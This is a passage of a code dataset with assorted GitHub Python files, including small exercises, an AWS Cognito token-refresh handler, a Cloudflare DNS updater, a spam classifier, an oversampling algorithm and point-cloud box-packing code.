'Ord').computeResultTable(simulatorLebal=\"neptuneplus/hotel/statistical\")\n\n","repo_name":"iticongolo/resourceAllocationSimulators","sub_path":"main-dependence-hotel.py","file_name":"main-dependence-hotel.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39131331285","text":"#HW4 part 2\n\nvalue_dict = {\n    'cito': 47.999,\n    'BB_studio': 42.999,\n    'momo': 49.999,\n    'main-service': 37.245,\n    'buy_now': 38.324,\n    'x-store': 37.166,\n    'the_partner': 38.988,\n    'sota': 37.720,\n    'rozetka': 38.003,\n}\n\nlower_limit = float(input('Enter the lower threshold -> '))\nupper_limit = float(input('Enter the upper threshold -> '))\n\nresults_dict = {}\n\nfor brand, price in value_dict.items():\n    if lower_limit < price < upper_limit:\n        results_dict[brand] = price\n\nprint(results_dict)\n","repo_name":"X4NDER78/HW4_part2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42215879032","text":"def rotLeft(a, d):\n    '''\n    In this challenge we have to \"rotate\" an array a to the left, given d rotations.\n\n    My solution is not clever, since it uses more memory than is really needed.\n\n    The new position of each element is just a translation by d, so basically we write \"x_translated = x_original - d\"\n    (Python's negative indexing handles the wrap-around).\n    '''\n    new = [0 for i in range(0,len(a))]\n    nova_posicao = 0\n\n    for i in range(len(a)):\n        nova_posicao = i - d\n        new[nova_posicao] = a[i]\n\n    return new","repo_name":"tiborboglar/hacker_rank","sub_path":"Left Rotation.py","file_name":"Left Rotation.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21053592635","text":"# Differences between lists and tuples\n# 1. A list is a mutable sequence: elements can be deleted or modified at any time.\n# 2. A tuple is an immutable sequence: elements cannot be deleted or modified, unless the whole tuple is replaced.\n#\n# Differences between lists and dictionaries\n# 1. A list is an ordered collection of objects.\n# 2. A dictionary is an unordered collection of objects.\n\n# A dictionary uses curly braces {} and stores the related information of one object.\n\nxiaoming = {\"name\": \"小明\",\n    \"age\": 18,\n    \"height\": 1.67,\n    \"qq\": 123456,\n    \"weixin_name\": \"hhaha\"\n    }\nprint(xiaoming)\nxiaoming_dict = {\"name\": \"小明\"}\n# Reading a value\nprint(xiaoming_dict[\"name\"])\n# Adding / modifying\n# If the key does not exist, a new key-value pair is added.\n# If the key exists, the existing key-value pair is modified.\nxiaoming_dict[\"test\"] = 18\nxiaoming_dict[\"name\"] = \"小小明\"\nprint(xiaoming_dict)\n# Deleting: del or pop\n# xiaoming_dict.pop('name')\n# del xiaoming_dict[\"name\"]\nprint(xiaoming_dict)\n\n\n# xiaoming={\"name\":\"小明\",\n#     \"age\":18,\n#     \"height\":1.67,\n#     \"qq\":123456,\n#     \"weixin_name\":\"hhaha\"\n#     }\n# print(xiaoming)\n# # Counting entries\n# print(len(xiaoming))\n# # Merging\n# # Note: if the merged dictionary contains keys that already exist, the existing key-value pairs are overwritten.\n# temp_list={\"xiaoxiaoming\":\"小小明\",\n#     \"age\":10,\n#     \"height\":135,\n#     }\n# xiaoming.update(temp_list)\n# print(xiaoming)\n# # Clearing\n# xiaoming.clear()\n# print(xiaoming)\n\n\n# # The first %s prints the key\n# # The second %s prints the value\n# # In each iteration, the variable i is the key of the current key-value pair\n\n# # Looping over a dictionary\n# xiaoming={\"name\":\"小明\",\n#     \"qq\":\"123456\",\n#     \"weixin_name\":\"hhaha\"\n#     }\n\n# for i in xiaoming:\n#     print(\"%s is %s\" % (i, xiaoming[i]))\n\n\nxiaoming = {\"name\": \"小明\",\n    \"age\": 18,\n    \"height\": 1.67,\n    \"qq\": 123456,\n    \"weixin_name\": \"hhaha\"\n    }\n\n\nfor key, value in xiaoming.items():\n    print(key, value)\n","repo_name":"6iujiale/All_Projects","sub_path":"Python/python基础/练习/第四章/字典.py","file_name":"字典.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
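Editorial note on the rotLeft record above: the same left rotation can be written in one idiomatic line with slicing; only the helper name rot_left below is illustrative, the behavior matches the original (for O(1) extra space one would instead use the three-reversal trick).

def rot_left(a, d):
    d %= len(a)           # also handles d >= len(a)
    return a[d:] + a[:d]  # shift every element d places left, wrapping around

# Example: rot_left([1, 2, 3, 4, 5], 2) -> [3, 4, 5, 1, 2]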
+{"seq_id":"73491522346","text":"import boto3\nimport os\nimport logging\n\nfrom utils import bad_request, response\n\n\nclient = boto3.client(\"cognito-idp\")\nCLIENT_ID = os.environ.get(\"COGNITO_CLIENT_ID\")\n\n\ndef handler(event, context):\n res = {}\n try:\n refresh_token = event[\"headers\"][\"Authorization\"].split()[1]\n res = client.initiate_auth(\n AuthFlow=\"REFRESH_TOKEN\",\n ClientId=CLIENT_ID,\n AuthParameters={\"REFRESH_TOKEN\": refresh_token}\n )\n except client.exceptions.NotAuthorizedException:\n err_msg = \"Invalid Refresh Token\"\n logging.warning(f\"!!! NotAuthorizedException: {err_msg}\")\n return bad_request(err_msg)\n except client.exceptions.InvalidParameterException:\n err_msg = \"Missing required parameter REFRESH_TOKEN\"\n logging.warning(f\"!!! InvalidParameterException: {err_msg}\")\n return bad_request(err_msg)\n except Exception as e:\n logging.warning(f\"!!! Other Exception: {e}\")\n return bad_request(repr(e))\n auth_result = res.get(\"AuthenticationResult\", {})\n res = {\n \"AccessToken\": auth_result.get(\"AccessToken\", \"\"),\n \"ExpiresIn\": auth_result.get(\"ExpiresIn\", \"\"),\n \"TokenType\": auth_result.get(\"TokenType\", \"\"),\n }\n return response(200, res)\n","repo_name":"barabanpan/aws-cognito-serverless","sub_path":"{{cookiecutter.project_slug}}/code/auth/refresh/refresh.py","file_name":"refresh.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24585551879","text":"\"\"\"YAML Cloudflare Config Parser.\"\"\"\n\nimport os\n\nimport requests\nimport yaml\n\nfrom ip_lock.exceptions import DNSZoneNameNotFound, DNSRecordsError, InvalidAuthToken\nfrom ip_lock.log import get_logger\nfrom ip_lock.ip import public_ip_address\n\n\nclass Cloudflare:\n \"\"\"Converts YAML file into Cloudflare Config Object\n \"\"\"\n\n def __init__(self, user_config):\n loglevel = \"DEBUG\" if user_config.verbose else os.getenv(\"LOGLEVEL\", None)\n self.logger = get_logger(\"ip_lock.Cloudflare\", loglevel=loglevel)\n\n config_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), \"cloudflare.yml\"\n )\n with open(config_path) as f:\n self.__dict__.update(yaml.safe_load(f))\n self.__dict__.update(user_config.__dict__)\n self._update_headers()\n self._validate_auth_token()\n self.__dict__.update({\"public_ip_address\": public_ip_address()})\n\n def _update_headers(self):\n \"\"\"Update headers dictionary with user defined values\n \"\"\"\n headers = {\n \"Authorization\": f'{self.headers[\"Authorization\"]}{self.auth_token}',\n # \"X-Auth-Key\": self.auth_token,\n \"X-Auth-Email\": self.auth_email,\n \"Content-Type\": \"application/json\",\n }\n self.headers = headers\n\n def _validate_auth_token(self):\n \"\"\"Validate CloudFlare Token\n \"\"\"\n url = \"{}/user/tokens/verify\".format(self.base_api_uri)\n res = requests.get(url, headers=self.headers).json()\n if not res[\"success\"]:\n raise InvalidAuthToken(f\"Invalid Auth Token: {self.auth_token}\\n\" f\"{res}\")\n\n def find_zone_id_by_name(self):\n \"\"\"Find your Zone ID by DNS name\n \"\"\"\n url = \"{}/zones?name={}\".format(self.base_api_uri, self.dns_zone_name)\n response = requests.get(url, headers=self.headers)\n if response and response.status_code == 200:\n result = response.json()[\"result\"]\n return result[0][\"id\"]\n raise DNSZoneNameNotFound(f'DNS Zone Name: \"{self.dns_zone_name}\" ' \"not found\")\n\n def list_dns_records(self):\n \"\"\"List DNS records for CloudFlare Zone\n\n GET 
/zones/:zone_identifier/dns_records\n \"\"\"\n url = \"{}/zones/{}/dns_records?\".format(self.base_api_uri, self.dns_zone_id)\n if hasattr(self, \"dns_record_type\") and self.dns_record_type:\n url = f\"{url}type={self.dns_record_type}\"\n response = requests.get(url, headers=self.headers)\n if response and response.status_code == 200:\n return response.json()[\"result\"]\n raise DNSRecordsError(\n f\"Response Code: {response.status_code} \\n\",\n f\"Response Body: {response.json()}\",\n )\n\n def should_update_records(self, records):\n \"\"\"Determine if public IP has changed\n \"\"\"\n for record in records:\n if record[\"content\"] != self.public_ip_address:\n return True\n return False\n\n def reduce_to_targets(self, records):\n \"\"\"Reduce DNS records to self.target_zone_names\n \"\"\"\n targets = []\n for record in records:\n if record[\"name\"] in self.target_zone_names:\n targets.append(record)\n return targets\n\n def update_dns_record(self, record):\n \"\"\"Update DNS Record IP Address\n \"\"\"\n url = \"{}/zones/{}/dns_records/{}\".format(\n self.base_api_uri, self.dns_zone_id, record[\"id\"]\n )\n payload = {\n \"type\": record[\"type\"],\n \"name\": record[\"name\"],\n \"content\": self.public_ip_address,\n }\n self.logger.debug(\"{} {}\".format(\"PUT\", url))\n self.logger.debug(payload)\n if self.dry_run:\n self.logger.debug(\"Dry run, not actually sending request.\")\n return True\n return requests.put(url, json=payload, headers=self.headers).json()[\"success\"]\n\n def update(self):\n \"\"\"Update DNS records (if we need too)\n \"\"\"\n self.dns_zone_id = self.find_zone_id_by_name()\n records = self.reduce_to_targets(self.list_dns_records())\n if not self.force and not self.should_update_records(records):\n self.logger.debug(\n \"Public IP address matches DNS \" \"records, no update needed.\"\n )\n return\n\n if not self.force:\n self.logger.debug(\"Public IP address changed! 
Updating DNS Records...\")\n        else:\n            self.logger.debug(\"Forcing update of DNS Records...\")\n        self.logger.debug(\n            \"{} --> {}\".format(records[0][\"content\"], self.public_ip_address)\n        )\n\n        self.logger.debug(\"\")\n        self.logger.debug(\"Updating {} records...\".format(len(records)))\n        for record in records:\n            if not self.force and record[\"content\"] == self.public_ip_address:\n                continue\n            self.logger.debug(\"\")\n            self.logger.debug(\"Updating: {}...\".format(record[\"name\"]))\n            if self.update_dns_record(record):\n                self.logger.debug(\"Update Successful.\")\n                continue\n            self.logger.debug(\"Update Failed.\")\n        self.logger.debug(\"\")\n        self.logger.debug(\"Complete.\")\n","repo_name":"chasenicholl/ip-lock","sub_path":"ip_lock/providers/cloudflare.py","file_name":"cloudflare.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"71633994988","text":"# https://open.kattis.com/problems/sibice\n\nmatches, width, height = map(int, input().split())\n\n# A match fits in the box iff it is no longer than the box diagonal.\nhypot = (width**2 + height**2) ** 0.5\n\nfor _ in range(matches):\n    length = int(input())\n    print(\"DA\" if length <= hypot else \"NE\")\n","repo_name":"gosueep/Kattis","sub_path":"Easy/Sibice.py","file_name":"Sibice.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6358168271","text":"import os\r\nimport sys\r\nimport json\r\nfrom math import log\r\n\r\ntrainData = None\r\nprint_fp = None\r\ntotalFiles = 0\r\nspamFiles = 0\r\nhamFiles = 0\r\nspamWords = 0\r\nhamWords = 0\r\nvocabSize = 0\r\n\r\ndef print_output(label, path):\r\n    global print_fp\r\n    output = label + ' ' + path + '\\n'\r\n    print_fp.write(output)\r\n\r\n\r\ndef get_training_data():\r\n    global trainData, totalFiles, spamFiles, hamFiles, spamWords, hamWords, vocabSize\r\n    with open('nbmodel.txt','r',encoding='latin1') as fp:\r\n        # json.loads no longer accepts an encoding argument (removed in Python 3.9);\r\n        # the file is already decoded by open() above.\r\n        trainData = json.loads(fp.read())\r\n    totalFiles = trainData['totalFilesCount']\r\n    spamFiles = trainData['spamFilesCount']\r\n    hamFiles = trainData['hamFilesCount']\r\n    spamWords = trainData['spamWordsCount']\r\n    hamWords = trainData['hamWordsCount']\r\n    vocabSize = trainData['vocabSize']\r\n\r\ndef calculate_naive_bayes(classify_tokens,file_path):\r\n    global spamFiles,hamFiles,hamWords,spamWords,vocabSize,print_fp\r\n    prob_spam = log((spamFiles/totalFiles))\r\n    prob_ham = log((hamFiles/totalFiles))\r\n    for eachToken in classify_tokens:\r\n        if eachToken in trainData['trainData'].keys():\r\n            prob_spam += log((trainData['trainData'][eachToken]['spam'] + 1)/ (spamWords + vocabSize))\r\n            prob_ham += log((trainData['trainData'][eachToken]['ham'] + 1)/ (hamWords + vocabSize))\r\n    if (prob_ham >= prob_spam):\r\n        print_output('ham',file_path)\r\n    else:\r\n        print_output('spam',file_path)\r\n\r\ndef classify(path):\r\n    global print_fp\r\n\r\n    with open('nboutput.txt',mode='w') as print_fp:\r\n        for root,dir,files in os.walk(path,topdown=False):\r\n            for fname in files:\r\n                file_path = os.path.join(root,fname)\r\n                with open(file_path,'r',encoding='latin1') as fp:\r\n                    devData = fp.read()\r\n                classify_tokens = devData.strip().split()\r\n                calculate_naive_bayes(classify_tokens,file_path)\r\n\r\nif __name__ == '__main__':\r\n    path = sys.argv[1]\r\n    get_training_data()\r\n    
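# Editorial note on calculate_naive_bayes above: the "+ 1" in each numerator is
# Laplace (add-one) smoothing, so a token never seen with a class cannot zero
# out the whole likelihood, and working in log space avoids floating-point
# underflow. The per-token update has this shape (the counts below are
# illustrative, not taken from the model file):
#
#     log_p += log((token_count_in_class + 1) / (words_in_class + vocab_size))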
classify(path)","repo_name":"venkys2002/Spam-detection-Email-Classifier-","sub_path":"nbclassify_stopwords.py","file_name":"nbclassify_stopwords.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9295341710","text":"\"\"\"new schema, sprites and image strips\n\nRevision ID: 681f51ea0301\nRevises: 88799a3f5dec\nCreate Date: 2023-08-28 19:56:11.059846\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '681f51ea0301'\ndown_revision = '88799a3f5dec'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    with op.batch_alter_table('fighters', schema=None) as batch_op:\n        batch_op.add_column(sa.Column('image_strip', sa.String(), nullable=True))\n        batch_op.drop_column('sprite_punch')\n        batch_op.drop_column('sprite_kick')\n        batch_op.drop_column('sprite_block')\n\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    with op.batch_alter_table('fighters', schema=None) as batch_op:\n        batch_op.add_column(sa.Column('sprite_block', sa.VARCHAR(), nullable=True))\n        batch_op.add_column(sa.Column('sprite_kick', sa.VARCHAR(), nullable=True))\n        batch_op.add_column(sa.Column('sprite_punch', sa.VARCHAR(), nullable=True))\n        batch_op.drop_column('image_strip')\n\n    # ### end Alembic commands ###\n","repo_name":"AmroGT500/project-fighter","sub_path":"server/migrations/versions/681f51ea0301_new_schema_sprites_and_image_strips.py","file_name":"681f51ea0301_new_schema_sprites_and_image_strips.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"15110914422","text":"import pyaudio\nimport numpy as np\n\nclass MusicPlayer:\n    def __init__(self, tempo=10, volume=0.1):\n        self.tempo = tempo\n        self.volume = volume\n        self.sample_rate = 44100\n        self.ticks_per_beat = 4\n        self.note_duration = 60 / self.tempo / self.ticks_per_beat\n        self.p = pyaudio.PyAudio()\n        self.stream = None\n\n    def play_notes(self, notes):\n        if self.stream and self.stream.is_active():\n            self.stream.stop_stream()\n            self.stream.close()\n\n        # Calculate total duration of the music\n        total_duration = sum(note[1] for note in notes) * self.note_duration\n\n        # Generate samples for each note\n        samples = []\n        for note in notes:\n            frequency = 440 * 2 ** ((note[0] - 69) / 12)\n            duration = note[1] * self.note_duration\n            samples += self._generate_samples(frequency, duration)\n\n        # Convert the list of samples to a numpy array\n        samples = np.array(samples)\n\n        # Scale the samples to the desired volume\n        samples *= self.volume\n\n        # Open a new audio stream and play the samples\n        self.stream = self.p.open(\n            format=pyaudio.paFloat32,\n            channels=1,\n            rate=self.sample_rate,\n            output=True\n        )\n        self.stream.write(samples.tobytes())\n\n    def _generate_samples(self, frequency, duration):\n        # Generate samples for a sine wave with the given frequency and duration.\n        # (The original hard-coded duration = 1 here, which ignored the requested\n        # note length; the passed-in duration is used instead, and the sample\n        # count is cast to int as np.linspace requires.)\n        n_samples = int(self.sample_rate * duration)\n        t = np.linspace(0, duration, n_samples, False)\n        note = np.sin(frequency * t * 2 * np.pi)\n        return note.astype(np.float32)\n\n    def close(self):\n        if self.stream and self.stream.is_active():\n            self.stream.stop_stream()\n            self.stream.close()\n        self.p.terminate()\n\nnotes = [(69, 1), (71, 4), (73, 4), (74, 4), (76, 4), (78, 4), (80, 4), (81, 4)]\n\nplayer = 
MusicPlayer(tempo=10, volume=0.1)\nplayer.play_notes(notes)\nimport time\n# Wait for the music to finish playing\ntime.sleep(len(notes) * player.note_duration)\n\n# Close the audio stream\nplayer.close()\n","repo_name":"naren-m/music","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12879061766","text":"\"\"\"\r\nThis module implements the ADOMS method.\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.decomposition import PCA\r\n\r\nfrom ..base import NearestNeighborsWithMetricTensor, coalesce\r\nfrom ..base import OverSampling\r\n\r\nfrom .._logger import logger\r\n_logger = logger\r\n\r\n__all__= ['ADOMS']\r\n\r\nclass ADOMS(OverSampling):\r\n \"\"\"\r\n References:\r\n * BibTex::\r\n\r\n @INPROCEEDINGS{adoms,\r\n author={Tang, S. and Chen, S.},\r\n booktitle={2008 International Conference on\r\n Information Technology and\r\n Applications in Biomedicine},\r\n title={The generation mechanism of synthetic\r\n minority class examples},\r\n year={2008},\r\n volume={},\r\n number={},\r\n pages={444-447},\r\n keywords={medical image processing;\r\n generation mechanism;synthetic\r\n minority class examples;class\r\n imbalance problem;medical image\r\n analysis;oversampling algorithm;\r\n Principal component analysis;\r\n Biomedical imaging;Medical\r\n diagnostic imaging;Information\r\n technology;Biomedical engineering;\r\n Noise generators;Concrete;Nearest\r\n neighbor searches;Data analysis;\r\n Image analysis},\r\n doi={10.1109/ITAB.2008.4570642},\r\n ISSN={2168-2194},\r\n month={May}}\r\n \"\"\"\r\n\r\n categories = [OverSampling.cat_dim_reduction,\r\n OverSampling.cat_extensive,\r\n OverSampling.cat_metric_learning]\r\n\r\n def __init__(self,\r\n proportion=1.0,\r\n n_neighbors=5,\r\n *,\r\n nn_params=None,\r\n n_jobs=1,\r\n random_state=None,\r\n **_kwargs):\r\n \"\"\"\r\n Constructor of the sampling object\r\n\r\n Args:\r\n proportion (float): proportion of the difference of n_maj and\r\n n_min to sample e.g. 
1.0 means that after\r\n                                sampling the number of minority samples\r\n                                will be equal to the number of majority\r\n                                samples\r\n            n_neighbors (int): parameter of the nearest neighbor component\r\n            nn_params (dict): additional parameters for nearest neighbor calculations, any\r\n                                parameter NearestNeighbors accepts, and additionally use\r\n                                {'metric': 'precomputed', 'metric_learning': '<method>', ...}\r\n                                with <method> in 'ITML', 'LSML' to enable the learning of\r\n                                the metric to be used for neighborhood calculations\r\n            n_jobs (int): number of parallel jobs\r\n            random_state (int/RandomState/None): initializer of random_state,\r\n                                                    like in sklearn\r\n        \"\"\"\r\n        super().__init__(random_state=random_state, checks=None)\r\n\r\n        self.check_greater_or_equal(proportion, 'proportion', 0.0)\r\n        self.check_greater_or_equal(n_neighbors, 'n_neighbors', 1)\r\n        self.check_n_jobs(n_jobs, 'n_jobs')\r\n\r\n        self.proportion = proportion\r\n        self.n_neighbors = n_neighbors\r\n        self.nn_params = coalesce(nn_params, {})\r\n        self.n_jobs = n_jobs\r\n\r\n    @classmethod\r\n    def parameter_combinations(cls, raw=False):\r\n        \"\"\"\r\n        Generates reasonable parameter combinations.\r\n\r\n        Returns:\r\n            list(dict): a list of meaningful parameter combinations\r\n        \"\"\"\r\n        parameter_combinations = {'proportion': [0.1, 0.25, 0.5, 0.75,\r\n                                                 1.0, 1.5, 2.0],\r\n                                  'n_neighbors': [3, 5, 7]}\r\n        return cls.generate_parameter_combinations(parameter_combinations, raw)\r\n\r\n    def generate_sample_in_neighborhood(self, sample, neighbors):\r\n        \"\"\"\r\n        Generate artificial sample in a neighborhood.\r\n\r\n        Args:\r\n            sample (np.array): one sample point\r\n            neighbors (np.array): the sample's neighbors\r\n\r\n        Returns:\r\n            np.array: the generated sample\r\n        \"\"\"\r\n        # fitting the PCA\r\n        pca = PCA(n_components=1)\r\n        pca.fit(neighbors)\r\n\r\n        # extracting the principal direction\r\n        principal_direction = pca.components_[0]\r\n\r\n        # do the sampling according to the description in the paper\r\n        random_index = self.random_state.randint(1, len(neighbors))\r\n        random_neighbor = neighbors[random_index]\r\n        diff = np.linalg.norm(random_neighbor - sample)\r\n        rand = self.random_state.random_sample()\r\n        inner_product = np.dot(random_neighbor - sample,\r\n                               principal_direction)\r\n        sign = 1.0 if inner_product > 0.0 else -1.0\r\n\r\n        return sample + sign*rand*diff*principal_direction\r\n\r\n    def sampling_algorithm(self, X, y):\r\n        \"\"\"\r\n        Does the sample generation according to the class parameters.\r\n\r\n        Args:\r\n            X (np.ndarray): training set\r\n            y (np.array): target labels\r\n\r\n        Returns:\r\n            (np.ndarray, np.array): the extended training set and target labels\r\n        \"\"\"\r\n        n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n        if n_to_sample == 0:\r\n            return self.return_copies(X, y, \"no need for sampling\")\r\n\r\n        X_min = X[y == self.min_label]\r\n\r\n        # fitting nearest neighbors model\r\n        n_neighbors = np.min([len(X_min), self.n_neighbors+1])\r\n\r\n        nn_params= {**self.nn_params}\r\n        nn_params['metric_tensor']= self.metric_tensor_from_nn_params(nn_params, X, y)\r\n\r\n        nearestn= NearestNeighborsWithMetricTensor(n_neighbors=n_neighbors,\r\n                                                   n_jobs=self.n_jobs,\r\n                                                   **(nn_params))\r\n        nearestn.fit(X_min)\r\n        indices = nearestn.kneighbors(X_min, return_distance=False)\r\n\r\n        samples = []\r\n        for _ in range(n_to_sample):\r\n            index = self.random_state.randint(len(X_min))\r\n            neighbors = X_min[indices[index]]\r\n            sample = X_min[index]\r\n\r\n            samples.append(self.generate_sample_in_neighborhood(sample,\r\n                                                                neighbors))\r\n\r\n        return (np.vstack([X, 
np.vstack(samples)]),\r\n                np.hstack([y, np.repeat(self.min_label, len(samples))]))\r\n\r\n    def get_params(self, deep=False):\r\n        \"\"\"\r\n        Returns:\r\n            dict: the parameters of the current sampling object\r\n        \"\"\"\r\n        return {'proportion': self.proportion,\r\n                'n_neighbors': self.n_neighbors,\r\n                'nn_params': self.nn_params,\r\n                'n_jobs': self.n_jobs,\r\n                **OverSampling.get_params(self)}\r\n","repo_name":"analyticalmindsltd/smote_variants","sub_path":"smote_variants/oversampling/_adoms.py","file_name":"_adoms.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"37"}
+{"seq_id":"25702141128","text":"import numpy as np\nimport open3d as o3d\nimport copy\nimport math\n\nclass DirectLine():\n    def __init__(self):\n        self.translation = None\n        self.rotation = None\n        self.start = None\n        self.end = None\n        self.unit = None\n\n\nclass BoxContainer():\n    def __init__(self):\n        self.dx = 0\n        self.dy = 0\n        self.dz = 0\n        self.x = 0\n        self.y = 0\n        self.z = 0\n        self.rotation = np.eye(3)\n        self.pcd = None\n        self.obbox = None\n        self.direction_x = None\n        self.direction_y = None\n        self.direction_z = None\n        self.items = []\n        self.prompt_box = None\n        self.volume = 0\n        self.acc_space = 0\n\n    def set_pcd(self, pcd):\n        self.pcd = pcd\n\n    def add_item(self, it):\n        self.items.append(it)\n\n    def est_acc_space(self):\n        self.acc_space = 0\n\n    def set_obbox(self, extent, translation, rotation):\n        self.dx = extent[0]\n        self.dy = extent[1]\n        self.dz = extent[2]\n        self.x = translation[0]\n        self.y = translation[1]\n        self.z = translation[2]\n        self.rotation = rotation  # fixed attribute typo: the original wrote self.rotaiton\n        self.obbox = o3d.geometry.OrientedBoundingBox(translation, rotation, extent)\n        self.volume = self.obbox.extent[0] * self.obbox.extent[1] * self.obbox.extent[2]\n\n        self.direction_y = DirectLine()\n        center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n        self.direction_y.start = np.array([[0], [-self.obbox.extent[1]/2], [0]])\n        self.direction_y.start = self.obbox.R @ self.direction_y.start + center\n        self.direction_y.translation = self.direction_y.start.T[0]\n        self.direction_y.end = np.array([[0], [self.obbox.extent[1]/2], [0]])\n        self.direction_y.end = self.obbox.R @ self.direction_y.end + center\n        self.direction_y.unit = (self.direction_y.end - self.direction_y.start).T[0]\n        self.direction_y.unit = self.direction_y.unit / np.linalg.norm(self.direction_y.unit)\n        local = np.array([[1,0,0],[0,0,1],[0,-1,0]])\n        self.direction_y.rotation = self.obbox.R @ local\n\n        self.direction_x = DirectLine()\n        center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n        self.direction_x.start = np.array([[-self.obbox.extent[0]/2], [0], [0]])\n        self.direction_x.start = self.obbox.R @ self.direction_x.start + center\n        self.direction_x.translation = self.direction_x.start.T[0]\n        self.direction_x.end = np.array([[self.obbox.extent[0]/2], [0], [0]])\n        self.direction_x.end = self.obbox.R @ self.direction_x.end + center\n        self.direction_x.unit = (self.direction_x.end - self.direction_x.start).T[0]\n        self.direction_x.unit = self.direction_x.unit / np.linalg.norm(self.direction_x.unit)\n        local = np.array([[0,0,1],[0,1,0],[-1,0,0]])\n        self.direction_x.rotation = self.obbox.R @ local\n\n        self.direction_z = DirectLine()\n        center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n        self.direction_z.start = np.array([[0], [0], [self.obbox.extent[2]/2]])\n        
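# Editorial note on the ADOMS record above: a minimal usage sketch, assuming an
# imbalanced dataset X, y is already loaded (the parameter values are
# illustrative, and the exact public entry point may vary between
# smote_variants releases):
#
#     oversampler = ADOMS(proportion=1.0, n_neighbors=5, random_state=42)
#     X_resampled, y_resampled = oversampler.sample(X, y)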
self.direction_z.start = self.obbox.R @ self.direction_z.start + center\n self.direction_z.translation = self.direction_z.start.T[0]\n self.direction_z.end = np.array([[0], [0], [-self.obbox.extent[2]/2]])\n self.direction_z.end = self.obbox.R @ self.direction_z.end + center\n self.direction_z.unit = (self.direction_z.end - self.direction_z.start).T[0]\n self.direction_z.unit = self.direction_z.unit / np.linalg.norm(self.direction_z.unit)\n local = np.array([[-1,0,0],[0,1,0],[0,0,-1]])\n self.direction_z.rotation = self.obbox.R @ local\n\n def gt_empty(self):\n rem_space = self.volume\n for pkg in self.items:\n rem_space -= pkg.volume\n return rem_space\n\n def acc_empty(self, unit = 0.02):\n new_pcd = copy.deepcopy(self.pcd)\n new_pcd.translate(-self.obbox.center)\n inv_rotate = np.linalg.inv(self.obbox.R)\n new_pcd.rotate(inv_rotate, center = [0,0,0])\n\n\n extent = [unit, unit, self.obbox.extent[2]]\n rotation = np.array([[1,0,0],[0,1,0],[0,0,1]])\n center = np.array([-self.obbox.extent[0]/2+unit/2,-self.obbox.extent[1]/2+unit/2,0])\n grid = o3d.geometry.OrientedBoundingBox(center, rotation, extent)\n\n x_count = int(self.obbox.extent[0]/unit)\n y_count = int(self.obbox.extent[1]/unit)\n ceiling = self.obbox.extent[2]/2\n self.acc_space = 0\n for i in range(0, x_count):\n for j in range(0, y_count):\n local_grid = copy.deepcopy(grid)\n local_grid.translate([i * unit, j * unit, 0])\n local_pcd = new_pcd.crop(local_grid)\n local_points = np.asarray(local_pcd.points)\n # if i == 10 and j == 15:\n # vis = o3d.visualization.Visualizer()\n # vis.create_window()\n # vis.add_geometry(new_pcd)\n # vis.add_geometry(local_grid)\n # opt = vis.get_render_option()\n # opt.show_coordinate_frame = True\n # vis.run()\n # vis.destroy_window()\n # print(\"done\")\n if len(local_points) > 5:\n avg = np.average(local_points, axis=0)\n self.acc_space += unit * unit * (ceiling-avg[2])\n\n return self.acc_space\n\n def estimate_place(self, bbox, z, step = 0.02, side_step = 0.01):\n self.prompt_box = bbox\n rotation = np.array([[1,0,0],[0,0.866,-0.5],[0,0.5,0.866]])\n self.prompt_box.rotate(rotation, center = [0,0,0])\n self.prompt_box.rotate(self.direction_y.rotation, center = [0,0,0])\n self.prompt_box.translate(self.direction_y.translation)\n self.prompt_box.translate([0,0,-z])\n length = self.prompt_box.extent[1] / 4 + self.prompt_box.extent[2]\n self.prompt_box.translate(length*self.direction_y.unit)\n count = int(self.obbox.extent[1] / step)\n result = 0\n good_config = [0,0,0]\n for i in range(0, count):\n flag = False\n for j in range(-5, 6):\n for t in range(-5, 6):\n local_box = copy.deepcopy(self.prompt_box)\n local_box.translate(i*step*self.direction_y.unit)\n local_box.translate(j*side_step*self.direction_x.unit)\n local_box.translate(t*side_step*self.direction_z.unit)\n local_pcd = self.pcd.crop(local_box)\n if (flag == False) and (len(local_pcd.points) < 100):\n flag = True\n good_config = [j,i,t]\n break\n if flag == True:\n break\n if flag == False:\n break\n\n self.prompt_box.translate(good_config[1]*step*self.direction_y.unit)\n self.prompt_box.translate(good_config[0]*side_step*self.direction_x.unit)\n 